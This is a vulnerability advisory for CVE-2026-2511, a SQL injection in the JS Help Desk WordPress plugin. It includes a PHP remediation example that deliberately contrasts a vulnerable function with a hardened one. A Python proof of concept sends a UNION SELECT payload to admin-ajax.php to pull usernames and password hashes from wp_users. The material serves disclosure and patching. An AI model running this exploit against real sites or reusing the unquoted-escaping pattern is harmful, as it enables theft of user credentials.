Security Vulnerability Report
CVE-2026-2511 CVSS 7.5 HIGH

Published: 2026-03-26 14:16:10
Last Modified: 2026-04-24 16:35:20

Description

The JS Help Desk – AI-Powered Support & Ticketing System plugin for WordPress is vulnerable to SQL Injection via the `multiformid` parameter in the `storeTickets()` function in all versions up to, and including, 3.0.4. This is due to the user-supplied `multiformid` value being passed to `esc_sql()` without enclosing the result in quotes in the SQL query, rendering the escaping ineffective against payloads that do not contain quote characters. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
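The description above explains why escaping alone fails here: esc_sql() only neutralises quote and backslash characters, so it protects a value that sits inside a quoted string literal and nothing else. The following PHP is an added example, not code from the JS Help Desk plugin, showing the vulnerable pattern next to a hardened form. It assumes WordPress is loaded (for esc_sql(), $wpdb and WP_Error); the table name example_forms, the column names and the function names are hypothetical placeholders.

```php
<?php
// Added example, not code from the JS Help Desk plugin. Assumes WordPress is
// loaded (esc_sql(), $wpdb and WP_Error available). The table example_forms
// and its columns are hypothetical placeholders, not the plugin's schema.

/**
 * The pattern the advisory describes: the value is escaped but then inserted
 * bare into a numeric comparison. esc_sql() only neutralises quote and
 * backslash characters, so input that avoids them is returned unchanged and
 * becomes part of the SQL statement.
 */
function jshd_example_vulnerable_lookup( $multiformid ) {
	global $wpdb;
	$escaped = esc_sql( $multiformid ); // no quotes in the input => returned as-is
	$sql     = "SELECT id, name FROM {$wpdb->prefix}example_forms WHERE id = " . $escaped;
	return $wpdb->get_results( $sql );
}

/**
 * Hardened form: enforce the expected type before the value reaches SQL, then
 * bind it with %d through $wpdb->prepare(), which does not rely on quoting.
 */
function jshd_example_hardened_lookup( $multiformid ) {
	global $wpdb;

	// Strict validation rejects anything that is not a positive integer.
	// absint()/intval() would instead coerce "1 <trailing SQL>" to 1, which
	// also defuses the injection but hides the attempt from your logs.
	$id = filter_var(
		$multiformid,
		FILTER_VALIDATE_INT,
		array( 'options' => array( 'min_range' => 1 ) )
	);
	if ( false === $id ) {
		error_log( 'jshd_example: rejected non-integer multiformid' );
		return new WP_Error( 'invalid_multiformid', 'multiformid must be a positive integer' );
	}

	// %d binds an integer; the query never depends on quoting the value.
	$sql = $wpdb->prepare(
		"SELECT id, name FROM {$wpdb->prefix}example_forms WHERE id = %d",
		$id
	);
	return $wpdb->get_results( $sql );
}
```

Either remediation neutralises the injection, but strict validation is preferable to absint()/intval() coercion: a rejected request can be logged and alerted on, whereas coercion silently turns a malicious value into a valid id. The same reasoning applies to any numeric parameter in a WordPress plugin: type enforcement plus a %d placeholder, not escaping, is what makes an unquoted value safe.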

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

JS Help Desk <= 3.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests

# Target URL (example)
target_url = "http://example.com/wp-admin/admin-ajax.php"

# Payload exploiting the lack of quotes in SQL query
# Using integer-based injection to bypass esc_sql()
payload = "1 UNION SELECT 1, user_login, user_pass FROM wp_users-- -"

data = {
    "action": "storeTickets",  # The vulnerable action/function
    "multiformid": payload,    # The vulnerable parameter
}

try:
    response = requests.post(target_url, data=data)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response:")
        print(response.text)
    else:
        print("[-] Request failed with status code:", response.status_code)
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://plugins.trac.wordpress.org/browser/js-support-ticket/tags/3.0.4/modules/fieldordering/model.php#L181
https://plugins.trac.wordpress.org/browser/js-support-ticket/tags/3.0.4/modules/fieldordering/model.php#L996
https://plugins.trac.wordpress.org/browser/js-support-ticket/tags/3.0.4/modules/ticket/model.php#L1178
https://plugins.trac.wordpress.org/changeset/3463031/
https://www.wordfence.com/threat-intel/vulnerabilities/id/2959c04a-70bd-4f5c-a61a-1eab2609f8ef?source=cve
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2511", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:10.017", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The JS Help Desk – AI-Powered Support & Ticketing System plugin for WordPress is vulnerable to SQL Injection via the `multiformid` parameter in the `storeTickets()` function in all versions up to, and including, 3.0.4. This is due to the user-supplied `multiformid` value being passed to `esc_sql()` without enclosing the result in quotes in the SQL query, rendering the escaping ineffective against payloads that do not contain quote characters. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}, {"lang": "es", "value": "El plugin JS Help Desk – AI-Powered Support &amp; Ticketing System para WordPress es vulnerable a inyección SQL a través del parámetro 'multiformid' en la función 'storeTickets()' en todas las versiones hasta e incluyendo la 3.0.4. Esto se debe a que el valor 'multiformid' proporcionado por el usuario se pasa a 'esc_sql()' sin encerrar el resultado entre comillas en la consulta SQL, lo que hace que el escape sea ineficaz contra cargas útiles que no contienen caracteres de comillas. Esto hace posible que atacantes no autenticados añadan consultas SQL adicionales a consultas ya existentes que pueden utilizarse para extraer información sensible de la base de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/js-support-ticket/tags/3.0.4/modules/fieldordering/model.php#L181", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/js-support-ticket/tags/3.0.4/modules/fieldordering/model.php#L996", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/js-support-ticket/tags/3.0.4/modules/ticket/model.php#L1178", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3463031/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2959c04a-70bd-4f5c-a61a-1eab2609f8ef?source=cve", "source": "[email protected]"}]}}